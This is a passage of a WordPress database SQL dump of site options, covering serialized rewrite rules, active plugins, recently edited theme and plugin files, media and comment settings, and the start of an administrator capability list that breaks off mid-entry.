"index.php?dt_slideshow=$matches[1]&feed=$matches[2]\";s:58:\"index.php/dt_slideshow/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?dt_slideshow=$matches[1]&feed=$matches[2]\";s:51:\"index.php/dt_slideshow/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?dt_slideshow=$matches[1]&paged=$matches[2]\";s:58:\"index.php/dt_slideshow/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?dt_slideshow=$matches[1]&cpage=$matches[2]\";s:47:\"index.php/dt_slideshow/([^/]+)(?:/([0-9]+))?/?$\";s:51:\"index.php?dt_slideshow=$matches[1]&page=$matches[2]\";s:39:\"index.php/dt_slideshow/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:49:\"index.php/dt_slideshow/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:69:\"index.php/dt_slideshow/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"index.php/dt_slideshow/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"index.php/dt_slideshow/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:45:\"index.php/dt_slideshow/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:48:\"index.php/dt_gallery/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:58:\"index.php/dt_gallery/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:78:\"index.php/dt_gallery/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:73:\"index.php/dt_gallery/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:73:\"index.php/dt_gallery/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:54:\"index.php/dt_gallery/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:37:\"index.php/dt_gallery/([^/]+)/embed/?$\";s:43:\"index.php?dt_gallery=$matches[1]&embed=true\";s:41:\"index.php/dt_gallery/([^/]+)/trackback/?$\";s:37:\"index.php?dt_gallery=$matches[1]&tb=1\";s:61:\"index.php/dt_gallery/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?dt_gallery=$matches[1]&feed=$matches[2]\";s:56:\"index.php/dt_gallery/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?dt_gallery=$matches[1]&feed=$matches[2]\";s:49:\"index.php/dt_gallery/([^/]+)/page/?([0-9]{1,})/?$\";s:50:\"index.php?dt_gallery=$matches[1]&paged=$matches[2]\";s:56:\"index.php/dt_gallery/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?dt_gallery=$matches[1]&cpage=$matches[2]\";s:45:\"index.php/dt_gallery/([^/]+)(?:/([0-9]+))?/?$\";s:49:\"index.php?dt_gallery=$matches[1]&page=$matches[2]\";s:37:\"index.php/dt_gallery/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:47:\"index.php/dt_gallery/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:67:\"index.php/dt_gallery/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"index.php/dt_gallery/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"index.php/dt_gallery/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:43:\"index.php/dt_gallery/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:55:\"index.php/go_pricing_tables/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:65:\"index.php/go_pricing_tables/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:85:\"index.php/go_pricing_tables/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:80:\"index.php/go_pricing_tables/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:80:\"index.php/go_pricing_tables/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:61:\"index.php/go_pricing_tables/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:44:\"index.php/go_pricing_tables/([^/]+)/embed/?$\";s:50:\"index.php?go_pricing_tables=$matches[1]&embed=true\";s:48:\"index.php/go_pricing_tables/([^/]+)/trackback/?$\";s:44:\"index.php?go_pricing_tables=$matches[1]&tb=1\";s:56:\"index.php/go_pricing_tables/([^/]+)/page/?([0-9]{1,})/?$\";s:57:\"index.php?go_pricing_tables=$matches[1]&paged=$matches[2]\";s:63:\"index.php/go_pricing_tables/([^/]+)/comment-page-([0-9]{1,})/?$\";s:57:\"index.php?go_pricing_tables=$matches[1]&cpage=$matches[2]\";s:52:\"index.php/go_pricing_tables/([^/]+)(?:/([0-9]+))?/?$\";s:56:\"index.php?go_pricing_tables=$matches[1]&page=$matches[2]\";s:44:\"index.php/go_pricing_tables/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"index.php/go_pricing_tables/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"index.php/go_pricing_tables/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"index.php/go_pricing_tables/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"index.php/go_pricing_tables/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:50:\"index.php/go_pricing_tables/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:42:\"index.php/feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:37:\"index.php/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:18:\"index.php/embed/?$\";s:21:\"index.php?&embed=true\";s:30:\"index.php/page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:37:\"index.php/comment-page-([0-9]{1,})/?$\";s:41:\"index.php?&page_id=3066&cpage=$matches[1]\";s:51:\"index.php/comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:46:\"index.php/comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:27:\"index.php/comments/embed/?$\";s:21:\"index.php?&embed=true\";s:54:\"index.php/search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:49:\"index.php/search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:30:\"index.php/search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:42:\"index.php/search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:24:\"index.php/search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:57:\"index.php/author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:52:\"index.php/author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:33:\"index.php/author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:45:\"index.php/author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:27:\"index.php/author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:79:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:74:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:55:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:67:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:49:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:66:\"index.php/([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:61:\"index.php/([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:42:\"index.php/([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:54:\"index.php/([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:36:\"index.php/([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:53:\"index.php/([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:48:\"index.php/([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:29:\"index.php/([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:41:\"index.php/([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:23:\"index.php/([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:68:\"index.php/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:78:\"index.php/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:98:\"index.php/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:93:\"index.php/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:93:\"index.php/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:74:\"index.php/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:63:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$\";s:91:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true\";s:67:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:87:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:82:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:75:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:82:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:71:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:57:\"index.php/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:67:\"index.php/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:87:\"index.php/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:82:\"index.php/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:82:\"index.php/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:63:\"index.php/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:74:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:61:\"index.php/([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:48:\"index.php/([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:37:\"index.php/.?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:47:\"index.php/.?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:67:\"index.php/.?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"index.php/.?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"index.php/.?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:43:\"index.php/.?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:26:\"index.php/(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:30:\"index.php/(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:50:\"index.php/(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:45:\"index.php/(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:38:\"index.php/(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:45:\"index.php/(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:34:\"index.php/(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),
(30,'hack_file','0','yes'),
(31,'blog_charset','UTF-8','yes'),
(32,'moderation_keys','','no'),
(33,'active_plugins','a:20:{i:0;s:41:\"Ultimate_VC_Addons/Ultimate_VC_Addons.php\";i:1;s:45:\"advanced-backgrounds/advanced-backgrounds.php\";i:2;s:33:\"classic-editor/classic-editor.php\";i:3;s:29:\"dt-the7-core/dt-the7-core.php\";i:4;s:33:\"duplicate-post/duplicate-post.php\";i:5;s:47:\"file-manager-advanced/file_manager_advanced.php\";i:6;s:21:\"filebird/filebird.php\";i:7;s:25:\"fluentform/fluentform.php\";i:8;s:25:\"go_pricing/go_pricing.php\";i:9;s:35:\"google-site-kit/google-site-kit.php\";i:10;s:27:\"js_composer/js_composer.php\";i:11;s:29:\"pdf-embedder/pdf_embedder.php\";i:12;s:38:\"recent-tweets-widget/recent-tweets.php\";i:13;s:23:\"revslider/revslider.php\";i:14;s:21:\"the7-cli/the7-cli.php\";i:15;s:35:\"ultimate-blocks/ultimate-blocks.php\";i:16;s:29:\"use-any-font/use-any-font.php\";i:17;s:16:\"v-form/vform.php\";i:18;s:31:\"wp-all-export/wp-all-export.php\";i:19;s:32:\"wp-google-fonts/google-fonts.php\";}','yes'),
(34,'category_base','','yes'),
(35,'ping_sites','http://rpc.pingomatic.com/','yes'),
(36,'comment_max_links','2','yes'),
(37,'gmt_offset','0','yes'),
(38,'default_email_category','1','yes'),
(39,'recently_edited','a:5:{i:0;s:106:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/plugins/advanced-backgrounds/advanced-backgrounds.php\";i:2;s:94:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/themes/dt-the7/woocommerce/loop/index.php\";i:3;s:89:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/themes/dt-the7/woocommerce/index.php\";i:4;s:106:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/themes/dt-the7/woocommerce/content-widget-product.php\";i:5;s:83:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/themes/dt-the7/wpml-config.xml\";}','no'),
(40,'template','dt-the7','yes'),
(41,'stylesheet','dt-the7','yes'),
(42,'comment_registration','0','yes'),
(43,'html_type','text/html','yes'),
(44,'use_trackback','0','yes'),
(45,'default_role','subscriber','yes'),
(46,'db_version','55853','yes'),
(47,'uploads_use_yearmonth_folders','1','yes'),
(48,'upload_path','','yes'),
(49,'blog_public','1','yes'),
(50,'default_link_category','2','yes'),
(51,'show_on_front','page','yes'),
(52,'tag_base','','yes'),
(53,'show_avatars','1','yes'),
(54,'avatar_rating','G','yes'),
(55,'upload_url_path','','yes'),
(56,'thumbnail_size_w','150','yes'),
(57,'thumbnail_size_h','150','yes'),
(58,'thumbnail_crop','1','yes'),
(59,'medium_size_w','300','yes'),
(60,'medium_size_h','300','yes'),
(61,'avatar_default','mystery','yes'),
(62,'large_size_w','1024','yes'),
(63,'large_size_h','1024','yes'),
(64,'image_default_link_type','none','yes'),
(65,'image_default_size','','yes'),
(66,'image_default_align','','yes'),
(67,'close_comments_for_old_posts','0','yes'),
(68,'close_comments_days_old','14','yes'),
(69,'thread_comments','1','yes'),
(70,'thread_comments_depth','5','yes'),
(71,'page_comments','0','yes'),
(72,'comments_per_page','50','yes'),
(73,'default_comments_page','newest','yes'),
(74,'comment_order','asc','yes'),
(75,'sticky_posts','a:0:{}','yes'),
(76,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),
(77,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),
(78,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),
(79,'uninstall_plugins','a:6:{s:23:\"elementor/elementor.php\";a:2:{i:0;s:21:\"Elementor\\Maintenance\";i:1;s:9:\"uninstall\";}s:25:\"go_pricing/go_pricing.php\";a:2:{i:0;s:12:\"GW_GoPricing\";i:1;s:9:\"uninstall\";}s:51:\"ti-woocommerce-wishlist/ti-woocommerce-wishlist.php\";s:23:\"uninstall_tinv_wishlist\";s:127:\"stripe-paymentsD:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/ti-woocommerce-wishlist/ti-woocommerce-wishlist.php\";s:23:\"uninstall_tinv_wishlist\";s:27:\"ninja-forms/ninja-forms.php\";s:21:\"ninja_forms_uninstall\";s:41:\"add-search-to-menu/add-search-to-menu.php\";a:2:{i:0;s:8:\"Freemius\";i:1;s:22:\"_uninstall_plugin_hook\";}}','no'),
(80,'timezone_string','','yes'),
(81,'page_for_posts','0','yes'),
(82,'page_on_front','3066','yes'),
(83,'default_post_format','0','yes'),
(84,'link_manager_enabled','0','yes'),
(85,'finished_splitting_shared_terms','1','yes'),
(86,'site_icon','0','yes'),
(87,'medium_large_size_w','768','yes'),
(88,'medium_large_size_h','0','yes'),
(89,'wp_page_for_privacy_policy','3','yes'),
(90,'show_comments_cookies_opt_in','1','yes'),
(91,'admin_email_lifespan','1696371793','yes'),
(92,'disallowed_keys','','no'),
(93,'comment_previously_approved','1','yes'),
(94,'auto_plugin_theme_update_emails','a:0:{}','no'),
(95,'auto_update_core_dev','enabled','yes'),
(96,'auto_update_core_minor','enabled','yes'),
(97,'auto_update_core_major','enabled','yes'),
(98,'wp_force_deactivated_plugins','a:0:{}','yes'),
(99,'initial_db_version','53496','yes'),
(100,'dnctiavkr_user_roles','a:12:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:264:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:9:\"access_cp\";b:1;s:20:\"mphb_manage_settings\";b:1;s:25:\"mphb_manage_booking_rules\";b:1;s:18:\"mphb_view_calendar\";b:1;s:26:\"mphb_manage_taxes_and_fees\";b:1;s:17:\"mphb_view_reports\";b:1;s:19:\"mphb_export_reports\";b:1;s:14:\"mphb_sync_ical\";b:1;s:16:\"mphb_import_ical\";b:1;s:19:\"mphb_view_customers\";b:1;s:18:\"mphb_edit_customer\";b:1;s:20:\"mphb_delete_customer\";b:1;s:18:\"edit_mphb_bookings\";b:1;s:26:\"edit_private_mphb_bookings\";b:1;s:25:\"edit_others_mphb_bookings\";b:1;s:28:\"edit_published_mphb_bookings\";b:1;s:20:\"delete_mphb_bookings\";b:1;s:28:\"delete_private_mphb_bookings\";b:1;s:27:\"delete_others_mphb_bookings\";b:1;s:30:\"delete_published_mphb_bookings\";b:1;s:18:\"read_mphb_bookings\";b:1;s:26:\"read_private_mphb_bookings\";b:1;s:21:\"publish_mphb_bookings\";b:1;s:20:\"edit_mphb_room_types\";b:1;s:28:\"edit_private_mphb_room_types\";b:1;s:27:\"edit_others_mphb_room_types\";b:1;s:30:\"edit_published_mphb_room_types\";b:1;s:22:\"delete_mphb_room_types\";b:1;s:30:\"delete_private_mphb_room_types\";b:1;s:29:\"delete_others_mphb_room_types\";b:1;s:32:\"delete_published_mphb_room_types\";b:1;s:20:\"read_mphb_room_types\";b:1;s:28:\"read_private_mphb_room_types\";b:1;s:23:\"publish_mphb_room_types\";b:1;s:25:\"edit_mphb_room_attributes\";b:1;s:33:\"edit_private_mphb_room_attributes\";b:1;s:32:\"edit_others_mphb_room_attributes\";b:1;s:35:\"edit_published_mphb_room_attributes\";b:1;s:27:\"delete_mphb_room_attributes\";b:1;s:35:\"delete_private_mphb_room_attributes\";b:1;s:34:\"delete_others_mphb_room_attributes\";b:1;s:37:\"delete_published_mphb_room_attributes\";b:1;s:25:\"read_mphb_room_attributes\";b:1;s:33:\"read_private_mphb_room_attributes\";b:1;s:28:\"publish_mphb_room_attributes\";b:1;s:17:\"edit_mphb_seasons\";b:1;s:25:\"edit_private_mphb_seasons\";b:1;s:24:\"edit_others_mphb_seasons\";b:1;s:27:\"edit_published_mphb_seasons\";b:1;s:19:\"delete_mphb_seasons\";b:1;s:27:\"delete_private_mphb_seasons\";b:1;s:26:\"delete_others_mphb_seasons\";b:1;s:29:\"delete_published_mphb_seasons\";b:1;s:17:\"read_mphb_seasons\";b:1;s:25:\"read_private_mphb_seasons\";b:1;s:20:\"publish_mphb_seasons\";b:1;s:15:\"edit_mphb_rates\";b:1;s:23:\"edit_private_mphb_rates\";b:1;s:22:\"edit_others_mphb_rates\";b:1;s:25:\"edit_published_mphb_rates\";b:1;s:17:\"delete_mphb_rates\";b:1;s:25:\"delete_private_mphb_rates\";b:1;s:24:\"delete_others_mphb_rates\";b:1;s:27:\"delete_published_mphb_rates\";b:1;s:15:\"read_mphb_rates\";b:1;s:23:\"read_private_mphb_rates\";b:1;s:18:\"publish_mphb_rates\";b:1;s:23:\"edit_mphb_room_services\";b:1;s:31:\"edit_private_mphb_room_services\";b:1;s:30:\"edit_others_mphb_room_services\";b:1;s:33:\"edit_published_mphb_room_services\";b:1;s:25:\"delete_mphb_room_services\";b:1;s:33:\"delete_private_mphb_room_services\";b:1;s:32:\"delete_others_mphb_room_services\";b:1;s:35:\"delete_published_mphb_room_services\";b:1;s:23:\"read_mphb_room_services\";b:1;s:31:\"read_private_mphb_room_services\";b:1;s:26:\"publish_mphb_room_services\";b:1;s:15:\"edit_mphb_rooms\";b:1;s:23:\"edit_private_mphb_rooms\";b:1;s:22:\"edit_others_mphb_rooms\";b:1;s:25:\"edit_published_